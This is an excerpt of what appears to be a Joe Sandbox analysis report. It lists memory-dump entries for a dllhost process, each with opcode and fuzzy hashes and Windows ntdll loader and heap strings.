                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-4253913091
                                                                                                      • Opcode ID: dd0b7201c107fe6a39ef75f0b6102bee19c32ec56fa1fd8cf7e880f1ccdea26b
                                                                                                      • Instruction ID: 0a3a0eeb410166bf6443cd0d3111404f38bba77ae602b7315b61ab4f3c5a00e5
                                                                                                      • Opcode Fuzzy Hash: dd0b7201c107fe6a39ef75f0b6102bee19c32ec56fa1fd8cf7e880f1ccdea26b
                                                                                                      • Instruction Fuzzy Hash: 0DF199B4A00609DFDB15CFA8C894B6AB7B9FF45304F1881E9E416DB381D734EA91CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                      • API String ID: 0-1145731471
                                                                                                      • Opcode ID: 4623f96f67bd219b886433398b042b4283213ccdc31da3c89ae61398be7a0db9
                                                                                                      • Instruction ID: 947e2d3fe9b4a820168367f4e78edc538da0f59ad740d0947a63e64526c08a06
                                                                                                      • Opcode Fuzzy Hash: 4623f96f67bd219b886433398b042b4283213ccdc31da3c89ae61398be7a0db9
                                                                                                      • Instruction Fuzzy Hash: 1CB1A039A057489FDB26CFE9C980BADB7B6AF44714F1845ADE851EB3A0D770E840CB50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                      • API String ID: 0-2391371766
                                                                                                      • Opcode ID: f58e339d14c30f68ffc80f7446eeaeb1602ce27513109fb10ee1b4650cb4ee69
                                                                                                      • Instruction ID: 3fbc591a454968afb0a6cdc872f3e6ab52cd2c3e3dc6511561ceba517b7ebadb
                                                                                                      • Opcode Fuzzy Hash: f58e339d14c30f68ffc80f7446eeaeb1602ce27513109fb10ee1b4650cb4ee69
                                                                                                      • Instruction Fuzzy Hash: BCB17D79604745AFE311EFD8C880F6BB7E8EB44B14F1449A9FA51DB290D7B4E804CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                      • API String ID: 0-2779062949
                                                                                                      • Opcode ID: b57f21977911199f810988cffde68c1710e7edc5e84bb711f967adb7e8eb35d5
                                                                                                      • Instruction ID: c2cad592437f3c02844806b54b66aa12ce243ce6465e2ceb46ee6cc9380881aa
                                                                                                      • Opcode Fuzzy Hash: b57f21977911199f810988cffde68c1710e7edc5e84bb711f967adb7e8eb35d5
                                                                                                      • Instruction Fuzzy Hash: 0BA159759116299BDB31DFA8CC88BEAB7B8EF44700F1401EAE909EB250D7359E84CF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                      • API String ID: 0-318774311
                                                                                                      • Opcode ID: 816ba0fa294dc3ee016758c9d6ee398770be72ccd11b70376ed3a340ed576e43
                                                                                                      • Instruction ID: a3a80cad162244ff586c5baf1106b6eea655380384cffc83e44c4f1d9d2817a0
                                                                                                      • Opcode Fuzzy Hash: 816ba0fa294dc3ee016758c9d6ee398770be72ccd11b70376ed3a340ed576e43
                                                                                                      • Instruction Fuzzy Hash: 79819079608344AFE711DB98C844B6AB7E8EF85754F0809AEF981EB390D7B4D904CB52
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %$&$@
                                                                                                      • API String ID: 0-1537733988
                                                                                                      • Opcode ID: 2de6ef8c34957bae4a2b30b48f771fe0549f4ebab3d4800742587416f8e489f3
                                                                                                      • Instruction ID: 1bdbebb151b51b003e25e5572cc48e78f9338fd8c870a31bb50051ada1b8bd8c
                                                                                                      • Opcode Fuzzy Hash: 2de6ef8c34957bae4a2b30b48f771fe0549f4ebab3d4800742587416f8e489f3
                                                                                                      • Instruction Fuzzy Hash: 6D71BE705087059FC710DFA8C580B2BBBEABF86618F14499DE4A6DB350D7B1D905CB92
                                                                                                      Strings
                                                                                                      • GlobalizationUserSettings, xrefs: 038DB834
                                                                                                      • TargetNtPath, xrefs: 038DB82F
                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 038DB82A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                      • API String ID: 0-505981995
                                                                                                      • Opcode ID: 092182e4a71b67250a4b52eec5f9637d67252d32fc288fbbc84640b6fa1cfc69
                                                                                                      • Instruction ID: 2fbf58f1216817c3d5455d66276250014c300b3dce21c22a2491b517e53b7faf
                                                                                                      • Opcode Fuzzy Hash: 092182e4a71b67250a4b52eec5f9637d67252d32fc288fbbc84640b6fa1cfc69
                                                                                                      • Instruction Fuzzy Hash: C0617076D41269AFDB22DF98CC88BD9B7B8AF04714F0601E5A509EB250DB74DE80CF90
                                                                                                      Strings
                                                                                                      • HEAP: , xrefs: 0385E6B3
                                                                                                      • HEAP[%wZ]: , xrefs: 0385E6A6
                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0385E6C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                      • API String ID: 0-1340214556
                                                                                                      • Opcode ID: df2786332d85f947084e1651fabdbc9a7f2ffe244a9ac8811bef688d5b8a49ec
                                                                                                      • Instruction ID: 9433b60ab2601b1f2f011ecd9143e701523f993334eabb6bf391876390d03c9b
                                                                                                      • Opcode Fuzzy Hash: df2786332d85f947084e1651fabdbc9a7f2ffe244a9ac8811bef688d5b8a49ec
                                                                                                      • Instruction Fuzzy Hash: E251C275604784EFD722DBA8C844BAABBF8BF05700F0800E5EA45DB792D774EA50DB11
                                                                                                      Strings
                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 038782D7
                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 038782DE
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 038782E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1783798831
                                                                                                      • Opcode ID: 7cc0808f3f9a1ac288a56f907fa0ece886e3c8d0ace931c647509287312d0ee4
                                                                                                      • Instruction ID: 327b6d5a46084f0a794ebef92ee042fa5474e6898c84db01ddc97db227172673
                                                                                                      • Opcode Fuzzy Hash: 7cc0808f3f9a1ac288a56f907fa0ece886e3c8d0ace931c647509287312d0ee4
                                                                                                      • Instruction Fuzzy Hash: 1441CFB5644704AFC720FBA8D845F5BB7F8EF45650F0449AAF954EB250EB74D800CB92
                                                                                                      Strings
                                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03871B39
                                                                                                      • LdrpAllocateTls, xrefs: 03871B40
                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 03871B4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                      • API String ID: 0-4274184382
                                                                                                      • Opcode ID: cd2a851cab0a7389325712e673bdbdf07b4fa44bb6b32ddc0d5e858c50e88aa7
                                                                                                      • Instruction ID: 06f3794759e6a6050cc03941a1abcd39d1599a35c244cfd92247f2c5d335d12d
                                                                                                      • Opcode Fuzzy Hash: cd2a851cab0a7389325712e673bdbdf07b4fa44bb6b32ddc0d5e858c50e88aa7
                                                                                                      • Instruction Fuzzy Hash: 42416DB9A00608AFDB15EFE8C845AADFBF6FF49704F148199E405E7744D775A900CBA0
                                                                                                      Strings
                                                                                                      • PreferredUILanguages, xrefs: 038BC212
                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 038BC1C5
                                                                                                      • @, xrefs: 038BC1F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                      • API String ID: 0-2968386058
                                                                                                      • Opcode ID: 6247b6b55c8a22e9815267c87c1b518bcf19a15b72e2ee1683546ad48db85629
                                                                                                      • Instruction ID: cae4eadc90091edb5b916ac12d0817ebfbbaadede423a0a8cead9c0852027064
                                                                                                      • Opcode Fuzzy Hash: 6247b6b55c8a22e9815267c87c1b518bcf19a15b72e2ee1683546ad48db85629
                                                                                                      • Instruction Fuzzy Hash: F6416175E0060EEBDB11DAE8C881BEEBBBCAB14704F1440AAE545F7350D7749A45CB51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                      • API String ID: 0-1373925480
                                                                                                      • Opcode ID: c917244a04f8e5b7acb5a742c7ff6b68a1418a2082b06b2072eccf21475ac63c
                                                                                                      • Instruction ID: 6ff659d1cdc3f7877d6402055d378aac43dc6c80e9c1d7e3cd656fed494a7a11
                                                                                                      • Opcode Fuzzy Hash: c917244a04f8e5b7acb5a742c7ff6b68a1418a2082b06b2072eccf21475ac63c
                                                                                                      • Instruction Fuzzy Hash: E141CC359007988BEF26DBEAC840BADB7B9FF45344F1804EAD901EF691DA748902CB11
                                                                                                      Strings
                                                                                                      • LdrpCheckRedirection, xrefs: 0388488F
                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03884888
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 03884899
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-3154609507
                                                                                                      • Opcode ID: cc1f04478e99aed11f4efc845ef9d814453888c0063fba90a4207e45411aab83
                                                                                                      • Instruction ID: 9c4cea834a20b968d6b822e7159e3c264c6b3c0a9e2b79f5133e810bb26d8fe3
                                                                                                      • Opcode Fuzzy Hash: cc1f04478e99aed11f4efc845ef9d814453888c0063fba90a4207e45411aab83
                                                                                                      • Instruction Fuzzy Hash: 8941B233A007569FCB21FF9AD940A26B7E8EF49750B090AE9EC54DB315E731E800CB91
                                                                                                      Strings
                                                                                                      • Actx , xrefs: 038333AC
                                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 038729FE
                                                                                                      • RtlCreateActivationContext, xrefs: 038729F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                      • API String ID: 0-859632880
                                                                                                      • Opcode ID: b70bee30bd6350894fcd40b871d8cd71fc842e5277285aaf53afb8b03ad3329d
                                                                                                      • Instruction ID: 77c70bd8a088ae1caa80325c67dd3f6a2afdbf706659bf0bb46c4826097d5a65
                                                                                                      • Opcode Fuzzy Hash: b70bee30bd6350894fcd40b871d8cd71fc842e5277285aaf53afb8b03ad3329d
                                                                                                      • Instruction Fuzzy Hash: B63114366003059FDB26DF98D880F96B7A5EB95724F1944A9ED04EF381D7B0E941C7D0
                                                                                                      Strings
                                                                                                      • LdrpInitializeTls, xrefs: 03871A47
                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 03871A40
                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 03871A51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                      • API String ID: 0-931879808
                                                                                                      • Opcode ID: c196ad4bdc941fced6a2fdcb8be2cab9b3a95d70e16c926a51c5180135f4a2e1
                                                                                                      • Instruction ID: fb26cf10962869dda6f89e7d68d1b37e3c8ff5dd67d14919c50b07da64a2b397
                                                                                                      • Opcode Fuzzy Hash: c196ad4bdc941fced6a2fdcb8be2cab9b3a95d70e16c926a51c5180135f4a2e1
                                                                                                      • Instruction Fuzzy Hash: 1531B571A40604AFE710FBD8CC49F6A7A7DEB46B54F1501E9E506EB280E774ED4487D0
                                                                                                      Strings
                                                                                                      • @, xrefs: 038412A5
                                                                                                      • BuildLabEx, xrefs: 0384130F
                                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0384127B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                      • API String ID: 0-3051831665
                                                                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                      • Instruction ID: 7529d1c81e81bd71b79ab642a6e5ac4c9c832c07a04f4f8dd3fd2eb9cb109a21
                                                                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                      • Instruction Fuzzy Hash: FD31AF7690061CABDB11EFD9CC44E9EBBBDEB84750F0044A5F904EB660E734DA45CB91
                                                                                                      Strings
                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 038820F3
                                                                                                      • LdrpInitializationFailure, xrefs: 038820FA
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 03882104
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2986994758
                                                                                                      • Opcode ID: 225335daa8b860db90b81d6d866dc40fc8661ba86c2d24f88a30dd91bc08f1bd
                                                                                                      • Instruction ID: 11b6133b5531b2bbf432ee610d046d81ad31dbdf86728224f9b7e504fb3b38d7
                                                                                                      • Opcode Fuzzy Hash: 225335daa8b860db90b81d6d866dc40fc8661ba86c2d24f88a30dd91bc08f1bd
                                                                                                      • Instruction Fuzzy Hash: 89F0AFB9640708AFE624FB8CCC42F99776CEB44B54F6404E9F600EB682D6B0B9408A91
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: #%u
                                                                                                      • API String ID: 48624451-232158463
                                                                                                      • Opcode ID: b30795d55a46f15b05e994cabbd6fad7e000b4e2c212ca1c703bef2d6ede8383
                                                                                                      • Instruction ID: 50357663fe8db8867b79c01c97409f6279e58c94c27fa9ddb68f7792e67ae292
                                                                                                      • Opcode Fuzzy Hash: b30795d55a46f15b05e994cabbd6fad7e000b4e2c212ca1c703bef2d6ede8383
                                                                                                      • Instruction Fuzzy Hash: A7714BB5A002499FDB01DFE9C990BAEB7F8EF08704F1540A5E905EB251EB34EE51CB61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$@
                                                                                                      • API String ID: 0-149943524
                                                                                                      • Opcode ID: 304c277a9f0232445ee3a5228a06a2d1e4b6745dfc7fe399487edd2ddcb4203a
                                                                                                      • Instruction ID: f8dd10a399b75b59c03f012211f19f3e524deed277f7aeb094a40fe0756cabcd
                                                                                                      • Opcode Fuzzy Hash: 304c277a9f0232445ee3a5228a06a2d1e4b6745dfc7fe399487edd2ddcb4203a
                                                                                                      • Instruction Fuzzy Hash: 66329A745083518BCB24CF98C490B3EB7E9EFC6744F18499EE985DB290E774D9A0CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `$`
                                                                                                      • API String ID: 0-197956300
                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                      • Instruction ID: 5bcabfbdd515d1f00e94576677f878fc02ff05e3d0c81fe9e86d770c19cbec4c
                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                      • Instruction Fuzzy Hash: 82C1D5312243899BD728CFA8C841B6BFBE5BFC4318F088A6DF595CA290D779D505CB42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
